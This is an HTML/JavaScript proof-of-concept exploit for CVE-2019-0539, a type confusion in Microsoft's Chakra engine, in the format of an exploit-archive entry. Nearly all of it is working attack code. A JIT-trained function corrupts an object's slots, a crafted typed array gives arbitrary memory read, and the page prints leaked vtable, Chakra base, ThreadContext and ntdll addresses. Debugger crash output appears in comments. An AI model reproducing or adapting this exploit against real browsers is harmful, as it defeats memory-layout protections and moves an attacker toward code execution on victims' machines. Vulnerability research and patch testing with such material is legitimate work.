1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184 | <html>
<script>
/*
# Exploit Title: [getting Read permission through Type Confusion]
# Date: [date]
# Exploit Author: [Fahad Aid Alharbi]
# Vendor Homepage: [https://www.microsoft.com/en-us/]
# Version: [Chakra 1_11_4] (REQUIRED)
# Tested on: [Windows 10]
# CVE : [cve-2019-0539]
*/
/* author @0x4142 => Fahad Aid Alharbi
* cve-2019-0539
* Getting Read &_^
* date 27 Feb , 2019
*/
var convert = new ArrayBuffer(0x100);
var u32 = new Uint32Array(convert);
var f64 = new Float64Array(convert);
var BASE = 0x100000000;
function hex(x) {
return `0x${x.toString(16)}`
}
function bytes_to_u64(bytes) {
return (bytes[0]+bytes[1]*0x100+bytes[2]*0x10000+bytes[3]*0x1000000
+bytes[4]*0x100000000+bytes[5]*0x10000000000);
}
function i2f(x) {
u32[0] = x % BASE;
u32[1] = (x - (x % BASE)) / BASE;
return f64[0];
}
function f2i(x) {
f64[0] = x;
return u32[0] + BASE * u32[1];
}
obj = {}
obj.a = 0x41;
obj.b = 0x42;
obj.c = 0x41;
obj.d = 0x42;
obj.e = 0x40;
obj.f = 0x40;
obj.g = 0x90;
obj.h = 0x90;
obj.i = 0x90;
t = new ArrayBuffer(0x200);
newL = 0x1000;
hax = new ArrayBuffer(0x2000);
read_me = 0;
function hit_to_read(t){
obj.h = hax; // set ta->buffer to hax
obj.i = newL; // update target's length
read_me = new Float64Array(t);
return read_me;
}
function read(r,read_me)
{
read_me[7] = i2f(r); // setup hax->buffer
//hax = new ArrayBuffer(0x1000);
return hex(f2i(read_me[7]))
}
function cout(f){return document.write(f);}
function opt(o, c, value) {
o.c = 1
//o.a = "HELLO"
// o.b = 3;
//o.e = 1
class A extends c {
}
o.a = value // will overwrite rcx , rdx , rax
//o.b = value => chakra!Js::RecyclableObject::HasOnlyWritableDataProperties+0xe:
//o.b = 0x42424242
o.c = 555555
// o.d = 4
}
function pwn() {
for (let i = 0; i < 0x1000; i++) {
let o = {a: 1, b: 2,c:3};
opt(o, (function () {}), {});
}
let o = {a: 2222, b: 2,c:4,d:5};
let cons = function () {};
cons.prototype = o;
/* line 120
auxSlots *p
__Vfptr | type | 0x00000001234 | 0x0
*/
opt(o, cons, obj);
o.f = t
read_me = hit_to_read(t);
cout("[+] vtable pointer is " + hex(f2i(read_me[0])));
vtable = hex(f2i(read_me[0]));
buffer_addr = f2i(read_me[7]);
Chakrabase = hex(vtable - 0x59a3c0)
cout("<br>")
cout("[+] ChakraBase : " + Chakrabase)
cout("<br>buffer_addr: " + read(buffer_addr + 40 , read_me))
ThreadContext = read(Chakrabase - 0xffec5448,read_me)
Ntdll = read(Chakrabase - 0xdd9a0000,read_me)
cout("<br>")
cout("[+] ThreadContext : " + ThreadContext)
cout("<br>")
cout("[+] Ntdl : " + Ntdll)
}
pwn();
/*
s=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
chakra!Js::SimpleDictionaryTypeHandlerBase<unsigned short,Js::PropertyRecord const * __ptr64,0>::GetPropertyFromDescriptor<0>+0x59:
00007ffc`d61f4109 4c8b14c8 mov r10,qword ptr [rax+rcx*8] ds:00010000`41414141=????????????????
*/
/*
s=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
chakra!Js::SimpleDictionaryTypeHandlerBase<unsigned short,Js::PropertyRecord const * __ptr64,0>::GetPropertyFromDescriptor<0>+0x59:
00007ffc`d61f4109 4c8b14c8 mov r10,qword ptr [rax+rcx*8] ds:00010000`41414141=????????????????
*/
</script></html>
|
